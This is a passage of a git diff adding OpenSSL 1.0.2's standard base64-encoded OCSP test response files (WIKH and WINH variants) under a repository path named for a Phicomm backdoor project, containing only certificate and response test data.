+8cvmO5ZND8YG1ViwN162WFm9ivSoWBzvWDbU2JhQFb+XzrzCcdn0YbNiTxJh/vYm
+uDuxto00dpBgujSOAQv8B90iDEJ+sZpYRzDRj62qStRey0zpq5eX+pA+gdppMUFb
+4QvJf0El8TbLCWLN4TjrFe6ju7ZaN9zmgVYGQ2fMHKIGNScLuIA950nYwzRkIfHa
+YW6HqP1rCR1EiYmstEeCQyDxJx+RUlh+q8L1BKzaMYhS6s63MZzQuGseYStaCmbC
+fBIRKjnK621vAWvc7UR+0hqnZ+U=
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WIKH_D3.ors b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WIKH_D3.ors
new file mode 100644
index 0000000..cbac8e8
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WIKH_D3.ors
@@ -0,0 +1,38 @@
+MIIG8AoBAKCCBukwggblBgkrBgEFBQcwAQEEggbWMIIG0jCB+aF+MHwxCzAJBgNV
+BAYTAkFVMQwwCgYDVQQIEwNOU1cxDzANBgNVBAcTBlN5ZG5leTEUMBIGA1UEChML
+Q0FjZXJ0IEluYy4xHjAcBgNVBAsTFVNlcnZlciBBZG1pbmlzdHJhdGlvbjEYMBYG
+A1UEAxMPb2NzcC5jYWNlcnQub3JnGA8yMDEyMTAxMTE0MDYzNlowZjBkMDwwCQYF
+Kw4DAhoFAAQUi6TJyxcpGUU+u45zCZG5JfKDImUEFBe1MhvUx/Pg5o7zvdKwOu6y
+ORjRAgMLs8aAABgPMjAxMjEwMTExMzU4MTBaoBEYDzIwMTIxMDEzMTQwNjM2WjAN
+BgkqhkiG9w0BAQUFAAOCAQEAjcryO6FUK5+TcPBxJKixVt9q07Xy3qv1e/VFuJ0f
+tnYDcu83Q5yCta49PXaA13nFDFZ445wCDivDBLolS6JKSh+JrLpAxSBzak7Ps8wz
+DPNAtexZz9/hPPzHnGOMlRtew07jk+NX5ZgCxDZGmBHIHOGyab2WoqmpRTll0oP4
+b/DzI3mzrur5lm2NAT3ZJ8bVaWsAJBVTfUye3S4GRWlfGSRVAMk0QHnCkYP42okc
+psIKbvdIoS2gxo6kBTMevxciPV2lPIiSrIWH0IGm7AqGM5+Vz7IdbD6fOQd1I3uw
+O+1NugMYfScB6jCvSW2uESeRZ+qW/HMXQbU1eiH+x88UIKCCBL4wggS6MIIEtjCC
+Ap6gAwIBAgIDCpvzMA0GCSqGSIb3DQEBBQUAMHkxEDAOBgNVBAoTB1Jvb3QgQ0Ex
+HjAcBgNVBAsTFWh0dHA6Ly93d3cuY2FjZXJ0Lm9yZzEiMCAGA1UEAxMZQ0EgQ2Vy
+dCBTaWduaW5nIEF1dGhvcml0eTEhMB8GCSqGSIb3DQEJARYSc3VwcG9ydEBjYWNl
+cnQub3JnMB4XDTExMDgyMzAwMDI1NloXDTEzMDgyMjAwMDI1NlowfDELMAkGA1UE
+BhMCQVUxDDAKBgNVBAgTA05TVzEPMA0GA1UEBxMGU3lkbmV5MRQwEgYDVQQKEwtD
+QWNlcnQgSW5jLjEeMBwGA1UECxMVU2VydmVyIEFkbWluaXN0cmF0aW9uMRgwFgYD
+VQQDEw9vY3NwLmNhY2VydC5vcmcwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEK
+AoIBAQCcxtRv5CPHw3BLdR/k/K72YsRgodbP+UdAONmvBvWzhwm6B8h6O+M64sFr
+2w6be7SYBECIyOQgNJ1flK4MoAWhdBA/H5NtxaDOKbAqA27tO9GaevcPp7c518O0
+3hVnlPLvsN1f48nY0jQOXUTfv5nYXmD0OSSK/V3IRo0KsWB6T9UnMGCeEwb4Oqqz
+uzM0b4SBflzMEony/m6Tg/qL7qs2TLZAqe77+BZaVdFkDUnaBN7RyMruXySxeXiz
+mogT3WhROeloMa/X+E01bWBYBEK7VZIY9pgBpXQ7vDbbIGgYuIXUi20wh03WMy16
+VDYdV0IUXHpidNUeK9W/BPP/7APBAgMBAAGjRDBCMAwGA1UdEwEB/wQCMAAwJwYD
+VR0lBCAwHgYIKwYBBQUHAwIGCCsGAQUFBwMBBggrBgEFBQcDCTAJBgNVHREEAjAA
+MA0GCSqGSIb3DQEBBQUAA4ICAQAoT6p5f3cGprAcgrnzdenfTmDe9LCW7k2VnazA
+MAzpsD6gXcSlo4+3hoHem/SpKRH2tqi34DmImCiv/S6fxsKM4Gfn5rlkAFviuTvS
+r5Zrwh4ZKSfaoWv4bmbzmcAxvuxdMWHf/5PbjegjzFTbBMekVPZY/abYtD6kdHQZ
+VNgzwZVfTBfYhfa+Rg72I2zjKpMsjxMqWfTmUzW6wfK6LFudZqu0U1NnJw+IlnVU
+6WtjL885ebQrmcRqWz3nMhVLIu5L3w/s+VTLvm7If6jcMDNUjz8s2BPcJeCXg3TE
+STsyl6tvk17RRz2+9JskxVOk11xIn96xR4FCERIid2ek9z1xi7oYOajQF50i/9Gj
+ReDEfRSyb4/LzoKDOY+h4Q6jryeHh7WIHFiK5qrBN2y8qOoRJ/OqQnqci/BJBNpe
+g9Q9PJRgGSzRndTXNHiYRbeLpq7eGo3sPqlR9qBQ3rd98XGOU0RCMnzjKhENC3qo
+5PkSF2xs8RmjWktFSTDwjYo0qf1teo7CGHjgaPjQ7JE8Q4ysFOQndSWmLpqwDcI9
+HfIvPwUIWArQrJRh9LCNSyvHVgLqY9kw8NW4TlMxV2WqaYCkiKi3XVRrSFR3ahS1
+VBvRZ8KpplrV7rhXjVSSqqfLk1sX3l72Ck2F9ON+qbNFmvhgNjSiBY9neMgo804a
+wG/pag==
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WIKH_ND1.ors b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WIKH_ND1.ors
new file mode 100644
index 0000000..a16476f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WIKH_ND1.ors
@@ -0,0 +1,10 @@
+MIIB0woBAKCCAcwwggHIBgkrBgEFBQcwAQEEggG5MIIBtTCBnqIWBBSIRFH/UCpp
+Xi2I9CG62QzyzsvqfBgPMjAxMjEwMTEwODQxMTNaMHMwcTBJMAkGBSsOAwIaBQAE
+FEi2DTgjjfhFbk7lhD6jlBEYApefBBSJRFH/UCppXi2I9CG62QzyzsvqfAIQIuEz
+IiCgSN8psr+aMcKbB4AAGA8yMDEyMTAxMTA4NDExM1qgERgPMjAxMjEwMTUwODQx
+MTNaMA0GCSqGSIb3DQEBBQUAA4IBAQCNnhlBMxxh9z5AKfzAxiKs90CfxUsqfYfk
+8XlyF9VIfWRfEwzS6MF1pEzLnghRxTAmjrFgK+sxD9wk+S5Mdgw3nbED9DVFH2Hs
+RGKm/t9wkvrYOX6yRQqw6uRvU/5cibMjcyzKB/VQMwk4p4FwSUgBv88A5sTkKr2V
+eYdEm34hg2TZVkipPMBiyTyBLXs8D/9oALtnczg4xlTRSjDUvqoXL5haqY4QK2Pv
+mNwna6ACkwLmSuMe29UQ8IX2PUB4R5Etni5czyiKGxZLm+4NAhuEwWFNEzCyImPc
+087gHGU1zx+qVSlajqMJ/9ZXYjbt7WiWdhOTGEv4VMn8dHhRUs32
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WIKH_ND2.ors b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WIKH_ND2.ors
new file mode 100644
index 0000000..5aff2ab
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WIKH_ND2.ors
@@ -0,0 +1,10 @@
+MIIB0woBAKCCAcwwggHIBgkrBgEFBQcwAQEEggG5MIIBtTCBnqIWBBQLWOWLxkwV
+N6RAqTCpIb5HNlpW/xgPMjAxMjEwMTAyMzAzMTlaMHMwcTBJMAkGBSsOAwIaBQAE
+FOy+ZAvtiWulchtVZmfKU1ZI9ewTBBQMWOWLxkwVN6RAqTCpIb5HNlpW/wIQEaO0
+0OyNt3+doM1dLVEvQoAAGA8yMDEyMTAxMDIzMDMxOVqgERgPMjAxMjEwMTQyMzAz
+MTlaMA0GCSqGSIb3DQEBBQUAA4IBAQCHn2nGfEUX/EJruMkTgh7GgB0u9cpAepaD
+sPv9gtl3KLUZyR+NbGMIa5/bpoJp0yg1z5VL6CLMusy3AF6Cn2fyaioDxG+yc+gA
+PcPFdEqiIMr+TP8s7qcEiE6WZddSSCqCn90VZSCWkpDhnCjDRwJLBBPU3803fdMz
+oguvyr7y6Koxik8X/iUe8EpSzAvmm4GZL3veTI+x7IezJSrhCS9zM0ZHjySjoDxC
++ljGH0EuWPTmFEqZVGIq3cuahIYzKItUbYnXU6ipi/2p42qbsFeok7eEN0EYsY1a
+vRATHGRmU7Q5HLCq4rQtZC1cis52Mvc9x1W4z/Gt5A3FtgElXXNA
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WIKH_ND3.ors b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WIKH_ND3.ors
new file mode 100644
index 0000000..4f8a6ea
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WIKH_ND3.ors
@@ -0,0 +1,10 @@
+MIIB1AoBAKCCAc0wggHJBgkrBgEFBQcwAQEEggG6MIIBtjCBn6IWBBStvZh6NLQm
+9/rEJlTvA73gJMtUGhgPMjAxMjEwMTExMTM2NDdaMHQwcjBKMAkGBSsOAwIaBQAE
+FHyxZlScq9tE7mImFq30ZXv3etWUBBSuvZh6NLQm9/rEJlTvA73gJMtUGgIRAKcN
+bJWejX5BTb8DmevkCauAABgPMjAxMjEwMTExMTM2NDdaoBEYDzIwMTIxMDE1MTEz
+NjQ3WjANBgkqhkiG9w0BAQUFAAOCAQEAfnj3nh6z+USW6VlDWRytWpNmC1ZRwWlg
+P2+G4UF4HE8bMJkuiFLcZEVYTxlTYv+xAEpSFxdInFM2Q5C+O6pWOZ9NbikeR4oZ
+FTI1kAZ0Uw+YMpVM4ztvKBIpUSqlbi69iNJ9WGF6qzxVeqobSOyrjjwtTsuglUbR
++mshp/SP7Br2IIK+KM1vgsmVExPfGPYANyk7ki/Q8uUnjqkreeSa9WC2iJLGcybW
+YavDhYWALebUGukNeedkloYhdjPboPPxDkKNjakwIG8EkbJK7uXewMOHHOFvFTX3
+K388me8u5iQf4f3fj6ilEgs6f5Szzmb+vklPX0zIny/TVk2+Az7HmA==
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WINH_D1.ors b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WINH_D1.ors
new file mode 100644
index 0000000..ed627ba
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WINH_D1.ors
@@ -0,0 +1,32 @@
+MIIFzwoBAKCCBcgwggXEBgkrBgEFBQcwAQEEggW1MIIFsTCBoKIWBBRf2uQDFpGg
+Ywh4P1y2H9bZ2/BQNBgPMjAxMjEwMTExMzI5NDJaMHUwczBLMAkGBSsOAwIaBQAE
+FKFyDqBqfGICVPKo9Z3Se6Tzty+kBBSwsEr9HHUo+BxhqhP2+sGQPWsWowISESG8
+vx4IzALnkqQG05AvM+2bgAAYDzIwMTIxMDExMTAwMDAwWqARGA8yMDEyMTAxODEw
+MDAwMFowCwYJKoZIhvcNAQEFA4IBAQCX3gEX+JVfxuYmxBBxC9sNCi3o76ODIicr
+XMvm0DTO9VSyDBl7LDsMMgNMIDtO3flQSlBNZ2B9ikwyckXOSWXiXzybZVMdA/uq
+NchgkM9aChrlhG0AHZyYe/+dJSmEBFXkIomy+S6YQ7Mcs2s6WxCeWU7gB4XOy1zO
+/CvWjv0WQV1J2lZZ6pkvtECKAEjrVP275LA38HInFbYvVPXWzl4sDcX2TAxwUa4S
+xAJAfwl+B+oZSerZWGRo6KjZuB/OB31cB5n/lABmRez6Obi27D0UUCRv/eSbwOF4
+Ofaa/XzJt7sF7WpVgoR41HI88W7aN4vtcw1zcVsBmfRMUNYZSqtfoIID+DCCA/Qw
+ggPwMIIC2KADAgECAhIRISdENsrz1CSWG3VIBwfQERQwDQYJKoZIhvcNAQEFBQAw
+WTELMAkGA1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExLzAtBgNV
+BAMTJkdsb2JhbFNpZ24gRXh0ZW5kZWQgVmFsaWRhdGlvbiBDQSAtIEcyMB4XDTEy
+MDkxOTA3NDA1MFoXDTEyMTIxOTA4NDA1MFowgYUxCzAJBgNVBAYTAkJFMRkwFwYD
+VQQKExBHbG9iYWxTaWduIG52LXNhMUIwQAYDVQQDEzlHbG9iYWxTaWduIEV4dGVu
+ZGVkIFZhbGlkYXRpb24gQ0EgLSBHMiBPQ1NQIHJlc3BvbmRlciAtIDIxFzAVBgNV
+BAUTDjIwMTIwOTE5MDk0MDAwMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKC
+AQEAnCgMsBO+IxIqCnXCOfXJoIC3wj+f0s4DV9h2gJBzisWXkaJD2DfNrd0kHUXK
+qVVPUxnA4G5iZu0Z385/KiOt1/P6vQ/Z2/AsEh/8Z/hIyeZCHL31wrSZW4yLeZwi
+M76wPiBHJxPun681HQlVs/OGKSHnbHc1XJAIeA/M8u+lLWqIKB+AJ82TrOqUMj1s
+LjGhQNs84xPliONN5K7DrEy+Y65X/rFxN77Smw+UtcH1GgH2NgaHH8dpt1m25sgm
+UxZWhdx66opB/lbRQwWdGt7MC0kJFaWHDZq64DTuYoekFYSxAFu0nd0EekEHEJEi
+9mquB9cv/96SuEJl8BcUWU/1LwIDAQABo4GEMIGBMAkGA1UdEwQCMAAwDgYDVR0P
+AQH/BAQDAgeAMBMGA1UdJQQMMAoGCCsGAQUFBwMJMA8GCSsGAQUFBzABBQQCBQAw
+HQYDVR0OBBYEFF/a5AMWkaBjCHg/XLYf1tnb8FA0MB8GA1UdIwQYMBaAFLCwSv0c
+dSj4HGGqE/b6wZA9axajMA0GCSqGSIb3DQEBBQUAA4IBAQCKRl1iXFmOQtLseDWP
+Y5icDDBGiRi17CGgvIzGJi/ha0PhbO+X0TmQIEnRX3Mu0Er/Mm4RZSjMtJ2iZRh3
+tGf4Dn+jKgKOmgXC3oOG/l8RPHLf0yaPSdn/z0TXtA30vTFBLlFeWnhbfhovea4+
+snPdBxLqWZdtxmiwojgqA7YATCWwavizrBr09YRyDwzgtpZ2BwMruGuFuV9FsEwL
+PCM53yFlrM32oFghyfyE5kYjgnnueKM+pw1kA0jgb1CnVJRrMEN1TXuXDAZLtHKG
+5X/drah1JtkoZhCzxzZ3bYdVDQJ90OHFqM58lwGD6z3XuPKrHDKZKt+CPIsl5g7p
+4J2l
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WINH_D2.ors b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WINH_D2.ors
new file mode 100644
index 0000000..b89fcf8
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WINH_D2.ors
@@ -0,0 +1,32 @@
+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
+fBIRKjnK621vAWvc7UR+0hqnZ+U=
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WINH_D3.ors b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WINH_D3.ors
new file mode 100644
index 0000000..c3d7c94
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WINH_D3.ors
@@ -0,0 +1,38 @@
+MIIG8AoBAKCCBukwggblBgkrBgEFBQcwAQEEggbWMIIG0jCB+aF+MHwxCzAJBgNV
+BAYTAkFVMQwwCgYDVQQIEwNOU1cxDzANBgNVBAcTBlN5ZG5leTEUMBIGA1UEChML
+Q0FjZXJ0IEluYy4xHjAcBgNVBAsTFVNlcnZlciBBZG1pbmlzdHJhdGlvbjEYMBYG
+A1UEAxMPb2NzcC5jYWNlcnQub3JnGA8yMDEyMTAxMTE0MzkxOFowZjBkMDwwCQYF
+Kw4DAhoFAAQUjKTJyxcpGUU+u45zCZG5JfKDImUEFBa1MhvUx/Pg5o7zvdKwOu6y
+ORjRAgMLs8aAABgPMjAxMjEwMTExNDIzMjVaoBEYDzIwMTIxMDEzMTQzOTE4WjAN
+BgkqhkiG9w0BAQUFAAOCAQEAgdrf+v+BwEhG0ghTLMVmuxWprJr/9VFtpKpxQrTo
+egSoW+5JOPCUAStfw3R3u7QM8sJf9bnPorgoCoY1hPKcWNLhvf1Ng3QlVkNa6NcO
+EonbuI4KE9Rhoflpf//pD/3AFKzU+ecRs04KtYezKrUvC1RayGabd7bgtIpdFss4
+ZCZ22riqjFtqD3+2//AHg7VaqiJMKlRt05CMmGe+HKn5PEN9HaeI52nsTf+L1Jeh
+ItnaDPfV76vFHHXyUhR3iIgnqQDCig0q3yj7BQqH50+K+myiMAY+p8cuVqebno1i
+BzXxxpZl/fw1KnTFdEa7p2jtmXw3KZiHAWAddwg1F1tHTaCCBL4wggS6MIIEtjCC
+Ap6gAwIBAgIDCpvzMA0GCSqGSIb3DQEBBQUAMHkxEDAOBgNVBAoTB1Jvb3QgQ0Ex
+HjAcBgNVBAsTFWh0dHA6Ly93d3cuY2FjZXJ0Lm9yZzEiMCAGA1UEAxMZQ0EgQ2Vy
+dCBTaWduaW5nIEF1dGhvcml0eTEhMB8GCSqGSIb3DQEJARYSc3VwcG9ydEBjYWNl
+cnQub3JnMB4XDTExMDgyMzAwMDI1NloXDTEzMDgyMjAwMDI1NlowfDELMAkGA1UE
+BhMCQVUxDDAKBgNVBAgTA05TVzEPMA0GA1UEBxMGU3lkbmV5MRQwEgYDVQQKEwtD
+QWNlcnQgSW5jLjEeMBwGA1UECxMVU2VydmVyIEFkbWluaXN0cmF0aW9uMRgwFgYD
+VQQDEw9vY3NwLmNhY2VydC5vcmcwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEK
+AoIBAQCcxtRv5CPHw3BLdR/k/K72YsRgodbP+UdAONmvBvWzhwm6B8h6O+M64sFr
+2w6be7SYBECIyOQgNJ1flK4MoAWhdBA/H5NtxaDOKbAqA27tO9GaevcPp7c518O0
+3hVnlPLvsN1f48nY0jQOXUTfv5nYXmD0OSSK/V3IRo0KsWB6T9UnMGCeEwb4Oqqz
+uzM0b4SBflzMEony/m6Tg/qL7qs2TLZAqe77+BZaVdFkDUnaBN7RyMruXySxeXiz
+mogT3WhROeloMa/X+E01bWBYBEK7VZIY9pgBpXQ7vDbbIGgYuIXUi20wh03WMy16
+VDYdV0IUXHpidNUeK9W/BPP/7APBAgMBAAGjRDBCMAwGA1UdEwEB/wQCMAAwJwYD
+VR0lBCAwHgYIKwYBBQUHAwIGCCsGAQUFBwMBBggrBgEFBQcDCTAJBgNVHREEAjAA
+MA0GCSqGSIb3DQEBBQUAA4ICAQAoT6p5f3cGprAcgrnzdenfTmDe9LCW7k2VnazA
+MAzpsD6gXcSlo4+3hoHem/SpKRH2tqi34DmImCiv/S6fxsKM4Gfn5rlkAFviuTvS
+r5Zrwh4ZKSfaoWv4bmbzmcAxvuxdMWHf/5PbjegjzFTbBMekVPZY/abYtD6kdHQZ
+VNgzwZVfTBfYhfa+Rg72I2zjKpMsjxMqWfTmUzW6wfK6LFudZqu0U1NnJw+IlnVU
+6WtjL885ebQrmcRqWz3nMhVLIu5L3w/s+VTLvm7If6jcMDNUjz8s2BPcJeCXg3TE
+STsyl6tvk17RRz2+9JskxVOk11xIn96xR4FCERIid2ek9z1xi7oYOajQF50i/9Gj
+ReDEfRSyb4/LzoKDOY+h4Q6jryeHh7WIHFiK5qrBN2y8qOoRJ/OqQnqci/BJBNpe
+g9Q9PJRgGSzRndTXNHiYRbeLpq7eGo3sPqlR9qBQ3rd98XGOU0RCMnzjKhENC3qo
+5PkSF2xs8RmjWktFSTDwjYo0qf1teo7CGHjgaPjQ7JE8Q4ysFOQndSWmLpqwDcI9
+HfIvPwUIWArQrJRh9LCNSyvHVgLqY9kw8NW4TlMxV2WqaYCkiKi3XVRrSFR3ahS1
+VBvRZ8KpplrV7rhXjVSSqqfLk1sX3l72Ck2F9ON+qbNFmvhgNjSiBY9neMgo804a
+wG/pag==
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WINH_ND1.ors b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WINH_ND1.ors
new file mode 100644
index 0000000..af47552
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WINH_ND1.ors
@@ -0,0 +1,10 @@
+MIIB0woBAKCCAcwwggHIBgkrBgEFBQcwAQEEggG5MIIBtTCBnqIWBBSIRFH/UCpp
+Xi2I9CG62QzyzsvqfBgPMjAxMjEwMTEwODQxMTNaMHMwcTBJMAkGBSsOAwIaBQAE
+FEm2DTgjjfhFbk7lhD6jlBEYApefBBSIRFH/UCppXi2I9CG62QzyzsvqfAIQIuEz
+IiCgSN8psr+aMcKbB4AAGA8yMDEyMTAxMTA4NDExM1qgERgPMjAxMjEwMTUwODQx
+MTNaMA0GCSqGSIb3DQEBBQUAA4IBAQCNnhlBMxxh9z5AKfzAxiKs90CfxUsqfYfk
+8XlyF9VIfWRfEwzS6MF1pEzLnghRxTAmjrFgK+sxD9wk+S5Mdgw3nbED9DVFH2Hs
+RGKm/t9wkvrYOX6yRQqw6uRvU/5cibMjcyzKB/VQMwk4p4FwSUgBv88A5sTkKr2V
+eYdEm34hg2TZVkipPMBiyTyBLXs8D/9oALtnczg4xlTRSjDUvqoXL5haqY4QK2Pv
+mNwna6ACkwLmSuMe29UQ8IX2PUB4R5Etni5czyiKGxZLm+4NAhuEwWFNEzCyImPc
+087gHGU1zx+qVSlajqMJ/9ZXYjbt7WiWdhOTGEv4VMn8dHhRUs32
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WINH_ND2.ors b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WINH_ND2.ors
new file mode 100644
index 0000000..99417f7
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WINH_ND2.ors
@@ -0,0 +1,10 @@
+MIIB0woBAKCCAcwwggHIBgkrBgEFBQcwAQEEggG5MIIBtTCBnqIWBBQLWOWLxkwV
+N6RAqTCpIb5HNlpW/xgPMjAxMjEwMTAyMzAzMTlaMHMwcTBJMAkGBSsOAwIaBQAE
+FO2+ZAvtiWulchtVZmfKU1ZI9ewTBBQLWOWLxkwVN6RAqTCpIb5HNlpW/wIQEaO0
+0OyNt3+doM1dLVEvQoAAGA8yMDEyMTAxMDIzMDMxOVqgERgPMjAxMjEwMTQyMzAz
+MTlaMA0GCSqGSIb3DQEBBQUAA4IBAQCHn2nGfEUX/EJruMkTgh7GgB0u9cpAepaD
+sPv9gtl3KLUZyR+NbGMIa5/bpoJp0yg1z5VL6CLMusy3AF6Cn2fyaioDxG+yc+gA
+PcPFdEqiIMr+TP8s7qcEiE6WZddSSCqCn90VZSCWkpDhnCjDRwJLBBPU3803fdMz
+oguvyr7y6Koxik8X/iUe8EpSzAvmm4GZL3veTI+x7IezJSrhCS9zM0ZHjySjoDxC
++ljGH0EuWPTmFEqZVGIq3cuahIYzKItUbYnXU6ipi/2p42qbsFeok7eEN0EYsY1a
+vRATHGRmU7Q5HLCq4rQtZC1cis52Mvc9x1W4z/Gt5A3FtgElXXNA
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WINH_ND3.ors b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WINH_ND3.ors
new file mode 100644
index 0000000..73dc42d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WINH_ND3.ors
@@ -0,0 +1,10 @@
+MIIB1AoBAKCCAc0wggHJBgkrBgEFBQcwAQEEggG6MIIBtjCBn6IWBBStvZh6NLQm
+9/rEJlTvA73gJMtUGhgPMjAxMjEwMTExMTM2NDdaMHQwcjBKMAkGBSsOAwIaBQAE
+FH2xZlScq9tE7mImFq30ZXv3etWUBBStvZh6NLQm9/rEJlTvA73gJMtUGgIRAKcN
+bJWejX5BTb8DmevkCauAABgPMjAxMjEwMTExMTM2NDdaoBEYDzIwMTIxMDE1MTEz
+NjQ3WjANBgkqhkiG9w0BAQUFAAOCAQEAfnj3nh6z+USW6VlDWRytWpNmC1ZRwWlg
+P2+G4UF4HE8bMJkuiFLcZEVYTxlTYv+xAEpSFxdInFM2Q5C+O6pWOZ9NbikeR4oZ
+FTI1kAZ0Uw+YMpVM4ztvKBIpUSqlbi69iNJ9WGF6qzxVeqobSOyrjjwtTsuglUbR
++mshp/SP7Br2IIK+KM1vgsmVExPfGPYANyk7ki/Q8uUnjqkreeSa9WC2iJLGcybW
+YavDhYWALebUGukNeedkloYhdjPboPPxDkKNjakwIG8EkbJK7uXewMOHHOFvFTX3
+K388me8u5iQf4f3fj6ilEgs6f5Szzmb+vklPX0zIny/TVk2+Az7HmA==
